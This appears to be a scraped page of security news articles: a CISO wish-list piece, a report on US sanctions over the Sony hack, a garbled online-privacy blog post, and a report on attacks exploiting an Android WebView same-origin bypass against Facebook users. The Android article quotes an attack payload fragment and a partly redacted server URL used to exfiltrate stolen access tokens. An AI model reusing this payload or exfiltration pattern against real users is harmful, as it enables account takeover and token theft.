Security leaders must align themselves more closely to business strategy and “operationalize on the fundamentals of good IT,” said Rafal Los, director of solutions research and member of the Accuvant Office of the CISO. The goal is to get business leaders to see security as a strategic asset and not a drag on the budget.

CISOs must “resolve to be more than a technical security professional and to take responsibility for making difficult risk-benefit decisions that drive the business forward,” Trull said.

All of these wish list items sounded reasonable, but there was a sense of frustration among security experts about the obstacles in their way. The technology was not available, other C-suite executives and the board remained uninterested, or the integration with IT was too tense. Would 2015 be the year when information security professionals would get a seat at the table and be able to work with the organization to improve security?

If the wish list items were too much to ask for, “would you consider coming up with some sort of solution that would allow CISOs to take Sundays off?” Levine said.

Related Event: Request an Invitation to the 2015 CISO Forum

Subscribe to the SecurityWeek Email Briefing

view counter

Fahmida Y. Rashid is a Senior Contributing Writer for SecurityWeek. She has experience writing and reviewing security, core Internet infrastructure, open source, networking, and storage. Before setting out her journalism shingle, she spent nine years as a help-desk technician, software and Web application developer, network administrator, and technology consultant.

Previous Columns by Fahmida Y. Rashid:


SecurityWeek RSS Feed

US Slaps Sanctions on North Korea After Sony Hack

Posted on January 4, 2015 by in Security

The United States imposed new sanctions Friday on North Korea in retaliation for a cyber attack on Hollywood studio Sony Pictures.

In an executive order President Barack Obama authorized the US Treasury to place on its blacklist three top North Korean intelligence and arms operations, as well as 10 government officials, most of them involved in Pyongyang’s arms exports.

Obama said he ordered the sanctions because of “the provocative, destabilizing, and repressive actions and policies of the Government of North Korea, including its destructive, coercive cyber-related actions during November and December 2014.”

The activities “constitute a continuing threat to the national security, foreign policy, and economy of the United States,” he added, in a letter to inform congressional leaders.

“The order is not targeted at the people of North Korea, but rather is aimed at the Government of North Korea and its activities that threaten the United States and others,” Obama added.

The sanctions come after hackers penetrated Sony’s computers in late November, stealing and releasing over the Internet employee information, unreleased films and an embarrassing trove of emails between top company executives.

The hackers — a group calling itself Guardians of Peace — then began to issue threats against the company over the looming Christmas release of the comedy film “The Interview”, which depicts a fictional CIA plot to kill North Korea’s leader.

The threats led first to worried movie theater owners dropping the film and then Sony cancelling the public debut altogether, before releasing it online.

After the hackers invoked the 9/11 attacks in their threats, the White House branded it a national security threat, and an investigation by the FBI said North Korea was behind the Sony intrusion.

Pyongyang repeatedly denied involvement, but has applauded the actions of the shadowy Guardians of Peace group.

‘Proportional’ response

The White House stressed Friday that its response will be “proportional”, but also that the sanction actions were only “the first aspect of our response.”

“We take seriously North Korea’s attack that aimed to create destructive financial effects on a US company and to threaten artists and other individuals with the goal of restricting their right to free expression,” said White House press secretary Josh Earnest.

In parallel with the White House announcement, the Treasury named the first targets of sanctions in the Sony case.

They included the Reconnaissance General Bureau, the government’s main intelligence organization, and two top North Korean arms exporters: Korea Mining Development Trading Corporation (KOMID) and Korea Tangun Trading Corporation.

The individuals named included agents of KOMID in Namibia, Russia, Iran and Syria, and other representatives of the government and the sanctioned organizations.

An administration official, briefing reporters, said that they remain “very confident” in their assessment that Pyongyang is behind the attack on Sony, amid doubts raised by security experts.

The official said the three organizations had “no direct involvement” with the hacking. “They’re being designated to put pressure on the North Korean government,” the official said.

It was the first time the Treasury sanctions mechanism had been invoked due to a threat to a private company, the official acknowledged.

The sanctions forbid US individuals and companies from doing business with those blacklist, and freezes any assets those blacklisted might have on US territory.

A particular aim of such sanctions is to limit their access to international financial services by locking them out of the US financial system.

All three of the organizations blacklisted in the Sony case are already under US sanctions for the country’s persistence with its nuclear weapons program, its alleged provocations on the Korean peninsula, and other “continued actions that threaten the United States and others,” as Obama said in his letter.

Subscribe to the SecurityWeek Email Briefing

view counter

© AFP 2013

Tags:


SecurityWeek RSS Feed

Can you Just Take Extra Procedures to Protect Yourself On Line?

Posted on January 1, 2015 by in Blog

OnlinePrivacy-ThumbnailThere are lots of steps you can take to safeguard yourself on the web. Yet not every person takes enough time to do this. Some only leave everything to fate. What about you? Do you just take additional steps to safeguard your self online?there are many steps you can take to protect yourself on the web. Probably the most apparent means is to install anti-virus and anti-spyware software. It’s not that high priced and may be installed fairly easily. You can install a firewall as another type of protection. It works as a filter to keep undesired information away. Using an anti-spam email supplier can help you stay away from many undesired junk e-mail email messages from coming your path. These are merely several fast options, but they’re choices that folks who will be worried about their privacy typically exercise without question.

It is this a problem of yours? Not everyone feels the worry of their private information becoming stolen on line. They could be very trusting and merely assume it’s going to be fine so long as they don’t do just about anything to create regarding the undesirable interest.

Exactly what camp do you really belong to? Can you simply take additional measures to protect yourself on the web or would you keep it to fate and assume it’s all likely to be fine?

Note: there was a poll embedded inside this post, kindly look at the website to be involved in this post’s poll.

Image Credit: Wikimedia Commons

Facebook Users Targeted Via Android Same Origin Policy Vulnerability

Posted on December 29, 2014 by in Security

 Researchers at Trend Micro say attackers are actively exploiting a vulnerability in Android’s WebView browser in order to compromise Facebook accounts. 

The flaw allows the attackers to bypass Android’s Same Origin Policy (SOP), and impacts devices running versions of the operating system prior to 4.4. The vulnerability, CVE-2014-6041, was first disclosed in September by an independent researcher. But months later, the vulnerability continues to be exploited in the wild.

“The Android WebView in Android before 4.4 allows remote attackers to bypass the Same Origin Policy via a crafted attribute containing a u0000 character, as demonstrated by an onclick=”window.open(‘u0000javascript: sequence to the Android Browser application 4.2.1 or a third-party web browser,” according to the National Vulnerability Database.

According to Trend Micro Mobile Security Engineer Simon Huang, the attack targets Facebook users via a link in a particular Facebook page that leads to a malicious site. The page contains obfuscated JavaScript code that includes an attempt to load a Facebook URL in an inner frame. The user will only see a blank page as the page’s HTML has been set not to display anything via its div tag while the inner frame has a size of one pixel, he added.

“While these routines are being carried out, the SOP bypass is being performed,” he blogged, adding that a remote JavaScript file is loaded from a legitimate cloud storage provider.

The file, he noted, contains the malicious code of the attack and enables the attackers to perform the following activities on Facebook:

  1. Add friends
  2. Like and follow Facebook pages
  3. Modify subscriptions
  4. Authorize a Facebook app to access the user’s public profile, friends list, birthday information, likes and friends’ likes
  5. Steal the victim’s access tokens and upload them to their server  at http://{BLOCKED}martforchristmas.website/walmart/j/index.php?cid=544fba6ac6988&access_token= $ token;
  6. Collect analytics data (such as victims’ location, HTTP referrer,  etc.) using the legitimate service at https://whos.{BLOCKED}ung.us/pingjs/

“In addition to the code at the above site, we found a similar attack at <a href="http://redirect.viglink.com?key=11fe087258b6fc0532a5ccfc924805c0&u=http%3A%2F%2Fwww.%257bBLOCKED%257dphp.com%2Fx%2Ftoplu.php%22%3Ehttp%3A%2F%2Fwww.%7BBLOCKED%7Dphp.com%2Fx%2Ftoplu.php%3C%2Fa%3E%2C" Huang explained. "We believe both of them are created by the same author because they share several function names, as well as the client_id of the Facebook app."

“The client_id involved in this malware was “2254487659”,” he added. “This is an official BlackBerry App  maintained by BlackBerry. We confirmed with BlackBerry and clarified that this malware is trying to take advantage of the trusted BlackBerry brand name and steal user’s access-tokens, which can be used to make requests to Facebook APIs and read user’s information or to publish content to Facebook on behalf of a person.”

Blackberry is working with Facebook and Trend Micro to address the issue. Google has already issued a fix for the vulnerability for Android users.

Subscribe to the SecurityWeek Email Briefing

view counter

Brian Prince is a Contributing Writer for SecurityWeek.

Previous Columns by Brian Prince:


SecurityWeek RSS Feed